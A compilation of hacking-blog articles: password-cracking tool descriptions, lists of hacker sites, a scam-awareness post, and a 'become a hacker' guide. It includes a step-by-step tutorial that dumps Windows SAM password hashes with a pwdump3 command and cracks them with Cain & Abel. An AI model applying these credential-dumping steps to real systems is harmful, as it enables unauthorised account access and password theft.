A password cracker software, which is often referred to as a password recovery tool, can be used to crack or recover the password either by removing the original password, after bypassing the data encryption, or by outright discovery of the password. In the process of password cracking, a very common methodology used to crack the user password is to repeatedly make guesses for the probable password and perhaps finally hitting on the correct one. It cannot be denied that whenever we are referring to cyber security, passwords are the most vulnerable security links. On the other hand if the password is too completed, the user might forget it. Password Cracker software are often used by the hackers to crack the password and access a system to manipulate it. Do not unethically use these software for hacking passwords.

In the next section you would be getting familiar with some of the popular Password Cracker tools which are used by hackers for password cracking.

Ophcrack

It is a free password cracker software which is based on the effective implementation of the rainbow tables. It runs on a number of Operating Systems like Mac OS X, Unix/Linux and Windows Operating System. It is equipped with real-time graphs for analyzing the passwords and is an open source software. Ophcrack has the capability to crack both NTLM hashes as well as LM hashes.

Medusa

Medusa is one of the best online brute-force, speedy, parallel password crackers which is available on the Internet. It has been designed by the members of the website foofus.net. It is also widely used in Penetration testing to ensure that the vulnerability of the system can be exposed and appropriate security measures can be taken against hacking.

RainbowCrack

Rainbow Crack as the name suggests, is a cracker for hashes with the Rainbow Tables. It runs on multiple operating systems such as Linux, Windows Vista, Windows XP (Windows Operating Systems). It supports both Graphical User Interface as well as Command line Interface. It's software which is used for password cracking by generating rainbow tables, fuzzing all the parameters.

Wfuzz

Wfuzz is a flexible tool for brute forcing Internet based applications. It supports many features like Multithreading, Header brute forcing, Recursion when discovering directories, Cookies, Proxy Support, hiding results and encoding the URLs to name a few. Wfuzz is a useful tool for finding unlinked resources like scripts, directories and servlets as well.

Brutus

Brutus is one of the most flexible and free password crackers which operates remotely. It is popular also because of its high speed and operates under operating systems such as Windows 2000, Windows NT and Windows 9x. Currently it does not operate under the UNIX operating system. Brutus was initially designed to check network devices like routers for common as well as default passwords.

L0phtCrack

L0phtCrack which is now known as L0phtCrack6, is a tool which tests the strength of a password given, as well as to recover lost passwords on Microsoft Windows platform. Thus it is a tool for both password recovery as well as auditing the password. It uses techniques such as Rainbow tables, brute-force and dictionary to recover passwords.

Fgdump

Fgdump is a powerful cracking tool. In fact, it's much more powerful than pwdump6 as the latter has the tendency to hang whenever there is a presence of an antivirus. Fgdump has the capability to handle this problem of hanging by shutting down first. It later restarts the Antivirus software. It supports multi threading which is very relevant in the multitasking and multi-user environment.

THC Hydra

Every password security study has revealed that the biggest security weaknesses are the passwords. THC Hydra is a tool for cracking logins and it is flexible as it supports various protocols. It is very fast and at the same time, new modules can be easily added. Hydra can run on operating systems like Solaris 11, OSX, Windows and Linux.

John The Ripper

John the Ripper is a free software for password cracking which was originally designed for the Unix Operating System. At present, it can run on 15 Operating systems which includes 11 different versions of UNIX, Win32, DOS and BeOS. It has the capability to combine several password crackers into a single package which has made it one of the most popular cracking tools for hackers.

Aircrack

It is a network software suite used in 802.11 Wireless Local Area Networks. It consists of tools such as a packet sniffer, detector and a WEP. This tool runs on both Windows and Linux Operating systems. It can work with any type of wireless network interface controller, provided the driver is supporting the raw monitoring mode.

Cain And Abel

Cain and Abel, often referred to as Cain, is a tool for recovering the password in the Windows platform. It has the capability to recover various kinds of passwords using techniques such as cracking the password hashes by using brute-forcing, dictionary attacks, cryptanalysis attacks and packet sniffing in the network.

IKECrack

The objective of this security tool is to locate the valid user identities in a Virtual Public Network along with the secret key combinations. Once this is accomplished, this information can be used easily by a hacker to have access to a VPN in an unauthorized manner



Courtesy: http://www.fromdev.com

Websites for Hackers

1. Milw0rm

i have given this website the first rank because it is the major place for all
security guys,and penetration testers and the major of us hackers..


2. Hack a day
Second comes this,

its great for hackers to have a community like this, with compitions,and stuff

3. Security Focus
These guys are great in terms of security testing,

4.ASTALAVISTA - secuirt y & hacking community
Another great place like Top milw0rm…

5.PacketStorm Security
Name tells it all :)

6.Black Hat

7.Metasploit Project

8.Insecure.org: Top 75 Security tools

9.2600 Store

The Birth Of hacking Is here …..

10.Rootkit

Hope you get that,
These where the place you must visit,
Happy Hacking

Courtesy: http://hackerthedude.blogspot.in 

Hack Like a Pro: How to Grab & Crack Encrypted Windows Passwords

Welcome back, my neophyte hackers!
Several of you have written me asking how to crack passwords. The answer, in part, depends upon whether you have physical access to the computer, what operating system you are running, and how strong the passwords are.
In this first installment on password cracking, we'll assume the simplest arrangement; you're running Windows, attacking Windows, and have physical access to the computer whose passwords you're attempting to crack.

In future installments, we'll look at cracking passwords remotely, with and on Linux operating systems, and cracking famous web applications such as Gmail and Facebook, so keep coming back!

Step 1: Download Pwdump3

Windows systems encrypt user passwords and store them in a file named SAM and store them in the following directory:

• c:\Windows\system32\config

The first thing we need to do is grab this file. In an earlier article, we used Metasploit to hack into the malicious dictator's computer and grab his password hashes.
We can also grab the hashes without Metasploit if we have physical access to a computer on the network. This can be done with a neat piece of software called pwdump3. It's installed on BackTrack already, but you can download it for free on Windows using the link below.

• Click here to download pwdump3 for Windows.

Pwdump3 is able to grab the encrypted passwords for us, and we can then crack them with another password cracking tool. So, let's grab that SAM file with pwdump3!

Step 2: Grab the Hashes

Open a command prompt. Now navigate to the folder where you placed your pwdump3 app. I put mine on the desktop. Now type:

• c:/user/Desktop/pwdump3 mycomputer hashdumpfile.txt

When you hit enter, pwdump3 will grab the password hashes and place them in the file called "hashdumpfile.txt". Make sure that you replace "mycomputer" in the command above with the actual name of your computer. If you don't know the name of your computer, simply type "hostname" as the command prompt and Windows will return the name of your computer.
Pwdump3 can retrieve the password hashes from any computer on your network!

Step 3: Download Cain & Abel

Now that we have encrypted passwords (hashes), we now need to decrypt them so we can read and use them. Most hacking software is developed for the Linux operating system, then gets ported (recompiled) for Windows, but there is one delightful exception—Cain and Abel.
Cain and Abel is a hacking application exclusive to Windows that has never been ported for Linux. It's a powerful and free (but not open source) application that every hacker should be familiar with. We'll be using just one of its many capabilities, namely cracking Windows password hashes.

• Click here to download Cain and Abel for Windows.

Now that we have all the tools we need, let's start cracking those passwords!

Step 4: Crack the Passwords

Cain and Abel must be run with administrator privileges, so right-click the CAIN icon on your desktop and select "Run as administrator." It should then open up a screen that looks like this:

Next, click on the "Cracker" tab at the top of the work area, and provide Cain and Abel the password hashes to crack. Simply right-click on the white space in the center of Cain and Abel and a pull-down window will appear. Select "Import hashes from a text file."

Choose the file with the password hashes that you created with pwdump3 (in our example, we used "hasdumpfile.txt") or retrieved on Metasploit, then click on the "Next" button.
We can now right-click on the hashes and select what type of hash crack we want to proceed with. The fastest method is to use the "Dictionary attack."

If you navigate to the Cain folder on your system, you will see a folder called "Wordlist." You can use this relatively small word list or any other word list of your choice (there are numerous word lists available on the Internet with millions of words).
This method attempts all words from the dictionary file to find password matches, and generally is very fast as it can search through even a large dictionary file in just a few minutes. If this fails, select "Hybrid Attack" and finally, a "Brute-Force Attack." A brute force might be slow, but eventually, it will crack all passwords.
Okay, stay connected here at Null Byte, because we have more exciting Hack Like a Pro guides coming up soon!

Magnifying glass and password text images via Shutterstock

Hacking Someone's Facebook Password Using Some Software Or Website? No Sir You Can't!

Do you know there are over thousands of websites and software that claim to hack Facebook password of any account? They'd ask you the victim's profile ID, maybe your credentials and some money too and will reportedly tell you the password which, to be honest, never works. Ever wonder why? Let me tell you why, they're FAKE! They're a scam which tricks you somehow in losing your money or your own Facebook account. Just give it a thought, why would Zuckerberg and his team spend Billions of Dollars on Facebook if one could hack it in less than a minute? Today, we'll take a look at this topic in detail with some example websites and software and get answers to some common related questions.

 

Back in 2005, I came across a mechanism that reportedly hacked Yahoo mail password for a user using some simple tricks. It didn't work for me for obvious reasons but I didn't stop believing the possibility until I grew up to realize how helpless I am here. One of the major concerns of large organizations like Facebook and Yahoo is security because of the super sensitive information about people they have. Several hundred million dollars are spend yearly by these organizations to ensure security and then there's these websites that claim to undo all that protection in less than a minute.

The Facebook password cracking Websites and Software

Let's start with some examples here. I googled the subject and picked the top results without order. Didn't care to search harder because there are thousands such and I know that all are FAKE.

So let's look at this GETFBHACK.com.

Their FREE Facebook hacker program is said to be capable of cracking the password of any Facebook user within a day. Sounds cool, I could try it out, but my Norton Antivirus rejected the file straight away.

I also picked up another one. This Hack-Fbook-Password asks me to enter the profile ID of a user and it will crack the password. I said Okay and began the process.

It ran certain algorithms to determine the password and finally landed me on a page that said I could DOWNLOAD the password IF I fill an online survey first. Those of you who've been redirected to surveys would know they don't work and are put just so to get traffic and earn money.

I said maybe I should leave the website now but hey, they gave me a prize!

So I just became the luckiest person in my city just like that!

Now tell me, how can a sane person believe in all this?

The truth!

Let me get this straight to you, these websites do nothing at all just waste your time and are never able to do the job. In fact, downloaded programs just make the situation worse when you run them. I had my Norton Antivirus to guard me otherwise I could be in severe danger currently.

These software are mostly keyloggers and tracking programs that record your keystrokes and action and steal personal information from your computer in the background and send it to their master servers. So ultimately a hacker wannabe gets hacked, how ironic!

From now on in the post, I'll be using the word 'Hacker' for these websites and software since you're no more in the position to be called that.

Why do these 'Hackers' do all that?

Setting up websites, maintaining them and developing software is not an easy task. It requires some money. So why do these 'hackers' do all the hassle? It's because they get equivalent or more money in return. They can extract your credit card details and other banking info from your system and use it for their advantage. They can hack your account and use it for wrong purposes. Give me one reason why one wouldn't steal money and hack accounts for no loss.

Why people fall in their webs?

Why do people try to use such unreal hacking procedures? It's because it's unreal to me, it's unreal to you but not to those who are not much familiar with the working of a software. They get in the web of these hackers and eventually get screwed up pretty bad without consent.

The websites give guarantees and also portray their 'imaginary' happy customers so as to trick a reader. Such tactics are simple but really powerful and serves to their advantage in most cases. This is also why there are thousands of such websites available.

So is Facebook account an 'unbreakable fortress'?

Well, NO. Facebook accounts can be hacked. No online service is foolproof and that is because of the flaws and bugs in their software. There are several ACTUAL hackers in the world who can analyse a website's security and use that against it thus making hacking a reality.

But I'm 100% sure none of them uses these scam and fake websites that claim to do the impossible. You can check out our hacking section to know more.

I'll end the 'lesson' with an idiom, "look before you leap". Focus, think and then follow. In case of any queries or confusions head over to the comments section. Cheers :)

 

Fraudsters Shall Not Pass - Simple Advices On How To Avoid Scammers In Social Networks

Social networks are always great for communicative people; they make you closer to your friends, relatives and hackers. Social networks are very attractive for such kind of people. You can ask me: “Why do they need that?” All they need is your account. The fraud schemes may be different. But the main aim of them is money. They can ask your relatives for help, especially when you’re far away. Why shouldn’t they believe their own child, when he needs money?

Fraudsters do not disdain playing on the heartstrings. They can write everything, that there’s an accident, you’re in a hospital, etc. So today we’ll study to confront fraudsters and keep our nerves and money safe.

Consequences

The most people don’t think about possible risks when creating their profile on social networks. The more personal and professional information you give, the easier it is for fraudsters to rob you. Let us discuss the easiest scheme. Some criminals are simply searching for people living in the same city to plunder their houses. Why does it happen? Different people are writing perfect information, like “We’re going to visit California next weekends. Hoping it’ll be great” Of course it will be great. For the robber, because now he knows that the house will be empty during weekends and it’s the perfect opportunity for him.

The second thing is the photos. When you’re downloading images and photos on social networks not only your friends like them. It’s also the perfect resource for burglars. From home-made photos, they can receive information about your welfare and house structure. When you have a dog, the robber will be prepared, because everyone has photos with their home pets. That’s why we earnestly advise you not to put in the Internet photos of your house, and some things that can attract robbers, for instance your new car or a brilliant ring.

Advice

The next our advice – create a complicated password. We’ve just discussed what fraudsters can do with the access to your account, so try to protect yourself, your friends, and relatives as good as you can. Don’t make a password consisting of just your birth date. Remember, that it’s the first combination fraudsters try. Also, don’t put your birth date as the answer to the test question if it’s mail. Check out below article on password cracking.

 

Let us imagine that you have a complicated password, you don’t download the “rob-attractive” photos and one day you receive the link from your friend where he asks you to vote for him. Stop now. This can be a trap. If you’ll link, the fraudsters receive your personal data, such as login and password. Such scheme is called “fishing”. So, in this case, ask your friend something personal. The other variant is just to make him a call and ask about this. If you’ll receive the answer like “What are you talking about?” you should explain him that he was hacked and offer to change the password. Check out below tutorial to know about popular hacking method used to acquire sensitive information about oneself.

 Phones are really helpful things. Explain to your friends and relatives that you can be hacked and if they receive messages with money requests, they must call you at first and ask about that. Remember that your security is in your hands and be careful.

12 Simple Steps To Become A Hacker

Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hire hackers to protect their systems and information and are highly paid. We have prepared a list of 12 most important steps necessary to become a hacker, have a deeper look.

1. Learn UNIX/LINUX

UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning UNIX/LINUX, it is not possible to become a hacker.

2. Code in C language 

C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you should master C language.

3. Learn to code in more than one Programming Language

It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.

4. Learn Networking Concepts

Another important and essential step to become a hacker is to be good at networking concepts and understanding how the networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.

Understanding what LAN, WAN, VPN, Firewall is also important.

You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.

5. Learn More Than One Operating Systems 

It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.

6. Learn Cryptography

To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.

7. Learn more and more about hacking

Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.

8. Experiment A Lot

After learning some concepts, sit and practice them. Setup your own lab for experimental purpose. You need a good computer system to start with as some tools may require powerful processor, RAM etc. Keep on Testing and learning until you breach a system.

9. Write Vulnerability (Loop hole program)

Vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.

10. Contribute To Open Source Security Projects

An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA, APACHE offer open source projects. Contribute and be a part of them even if your contribution is small, it will add a big value to your field.

11. Continue never ending Learning 

Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems

12. Join Discussions and meet hackers 

Most important for a hacker is to make a community or join forums, discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking where you can get more from experts.